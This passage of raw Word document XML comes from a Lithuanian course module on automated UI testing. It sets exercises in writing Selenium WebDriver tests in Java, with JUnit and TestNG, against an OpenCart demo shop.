      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>- ištrintų prekes iš krepšelio ir</w:t>
      </w:r>
      <w:r w:rsidR="00C239DA" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> grįžtų į pradinį puslapį.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C239DA" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išsaugokite testą bei įsitikinkite, kad jis gali būti paleistas pakartotinai.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B64934" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="005F50FC" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00980EE4" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išmokti kurti nesudėtingus automatinius testus JAVA kalba, naudojant Selenium WebDriver</w:t>
      </w:r>
      <w:r w:rsidR="00685543" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00111C54"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r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="128" w:name="_Toc14392435"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Kurti vartotojo sąsajos automatinius testus naudojant programavimo kalbą ir testavimo karkasą.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0098608D" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A10615" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LOKATORIŲ NAUDOJIMAS</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C03">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0013074D" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>OpenCart žiniatinklio programai (kreipkitės į dėstytoją dėl konkrečios nuorodos) sukurkite testą (-us) kuris:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0013074D" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>- S</w:t>
      </w:r>
      <w:r w:rsidR="00F4545D" w:rsidRPr="00AD4464">
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>kuria kelias naujas paskyras;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0013074D" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>- Prisijungia su naujai sukurtais vartotojų profiliais prie paskyros ir patikrina visus duomanis “My account” puslapyje;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0013074D" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>- Pakoreguoja vartotojo duomenis ir išsaugo pakeitimus;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0013074D" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>- Atsijungia ir vėl prisijungia to pa</w:t>
      </w:r>
      <w:r w:rsidR="001453B2" w:rsidRPr="00AD4464">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>ies vartotojo vardu ir patikrina, ar pakeisti duome</w:t>
      </w:r>
      <w:r w:rsidR="001453B2" w:rsidRPr="00AD4464">
        <w:t>nys yra tink</w:t>
      </w:r>
      <w:r w:rsidR="00B64934" w:rsidRPr="00AD4464">
        <w:t>amai išsaugoti;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0013074D" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kurdami testą (-us), panaudo</w:t>
      </w:r>
      <w:r w:rsidR="00B64934" w:rsidRPr="00AD4464">
        <w:t>kite skirtingus lokatorių tipus</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C03">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B64934" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="00695EF3" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00C03FA5" w:rsidRPr="00AD4464">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="000B0892" w:rsidRPr="00AD4464">
        <w:t>š</w:t>
      </w:r>
      <w:r w:rsidR="00245108" w:rsidRPr="00AD4464">
        <w:t>mok</w:t>
      </w:r>
      <w:r w:rsidR="00C03FA5" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">ti kurti automatinius testus </w:t>
      </w:r>
      <w:r w:rsidR="000B0892" w:rsidRPr="00AD4464">
        <w:t>naudojant pagrindinius web element identifikavimo tipus (ang</w:t>
      </w:r>
      <w:r w:rsidR="00CC3845" w:rsidRPr="00AD4464">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="000B0892" w:rsidRPr="00AD4464">
        <w:t>. Locators).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009B6771" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A10615" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ASSERT METODŲ NAUDOJIMAS</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C03">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002B5614" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:lastRenderedPageBreak/>
        <w:t>OpenCart žiniatinklio programai (kreipkitės į dėstytoją dėl konkrečios nuorodos) sukurkite testą, kuris:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002B5614" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="851" w:hanging="425"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Naviguoja į “Phones &amp; PDA’s” puslapį;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002B5614" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="851" w:hanging="425"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Pasirenka “iPhone” telefoną ir paspaudžia ant nuorodos;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002B5614" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="851" w:hanging="425"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Atsidarusiame pasirinktos prekės puslapyje patikrina</w:t>
      </w:r>
      <w:r w:rsidR="00C121DB" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> telefono pavadinimą</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002B5614" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Gamintoją;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009B6771" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kainą, taip pat ir kainą</w:t>
      </w:r>
      <w:r w:rsidR="002B5614" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> be mokesčių;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009B6771" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Aprašymą</w:t>
      </w:r>
      <w:r w:rsidR="002B5614" w:rsidRPr="00AD4464">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002B5614" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Patikrina, ar yra nurodytas susijęs produktas: Apple Cinema 30’’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C121DB" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Tam panaudokite Assert metodus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C121DB" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">UŽDUOTIES TIKSLAS: </w:t>
      </w:r>
      <w:r w:rsidR="00324CAE" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išmokti kurti automatinius</w:t>
      </w:r>
      <w:r w:rsidR="000B0892" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> testus, naudojant Assert metodus elementų ir jų reikšmių tikrinimui.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00626756"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r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="129" w:name="_Toc14392436"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Kurti automatinius testus naudojant bibliotekas.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00324CAE" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis</w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A10615" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>JUNIT FUNKCIJŲ NAUDOJIMAS</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C03">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00324CAE" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>OpenCart žiniatinklio programai (kreipkitės į dėstytoją dėl konkrečios nuorodos) sukurkite testą, kuris:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00324CAE" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Prideda ke</w:t>
      </w:r>
      <w:r w:rsidR="0042181C" w:rsidRPr="00AD4464">
        <w:t>lias prekes į pirkinių krepšelį.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00324CAE" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Paš</w:t>
      </w:r>
      <w:r w:rsidR="0042181C" w:rsidRPr="00AD4464">
        <w:t>alina visas prekes iš krepšelio.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00324CAE" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Panaudokite Junit ano</w:t>
      </w:r>
      <w:r w:rsidR="00297F9C" w:rsidRPr="00AD4464">
        <w:t>tacijas: @Test, @Before, @After</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00297F9C" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="00111F14" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="000B0892" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išmokti kurti automatinius testus naudojant anotacijas ir kitas JUnit karkaso galimybes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00324CAE" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C72318" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00A10615" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TESTNG FUNKCIJŲ NAUDOJIMAS</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C03">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="008F039C" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">OpenCart žiniatinklio programai (kreipkitės į dėstytoją dėl konkrečios nuorodos) sukurkite testą, kuris: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="008F039C" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Naviguoja į “Phones &amp; PDA’s” puslapį;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="008F039C" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Pasirenka prekę ir paspaudžia ant nuorodos joje;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="008F039C" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Atsidarusiame pasirinktos prekės puslapyje patikrina:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0042181C" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Prekės pavadinimą</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0042181C" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Gamintoją</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="008F039C" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kainą</w:t>
      </w:r>
      <w:r w:rsidR="0042181C" w:rsidRPr="00AD4464">
        <w:t>, taip pat ir kaina be mokesčių</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="008F039C" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Gr</w:t>
      </w:r>
      <w:r w:rsidR="00046078" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>įžta į pradi</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>nį puslapį.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="008F039C" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Šį veiksmą pakartoja kelis kartus su skirtingomis prekėmis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="008F039C" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Panaudokite NUnit anotacijas: @Before, @After, @Parameters, @Test (Priority = xx), @BeforeMethod, @AfterMethod. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="008F039C" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Kurdami testą, atsižvelkite, kad telefonų prekės yra paklausesnės, nei a</w:t>
      </w:r>
      <w:r w:rsidR="004B634E" w:rsidRPr="00AD4464">
        <w:t>smeninių elektroninių asistentų</w:t>
      </w:r>
      <w:r w:rsidR="00AD6C03">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
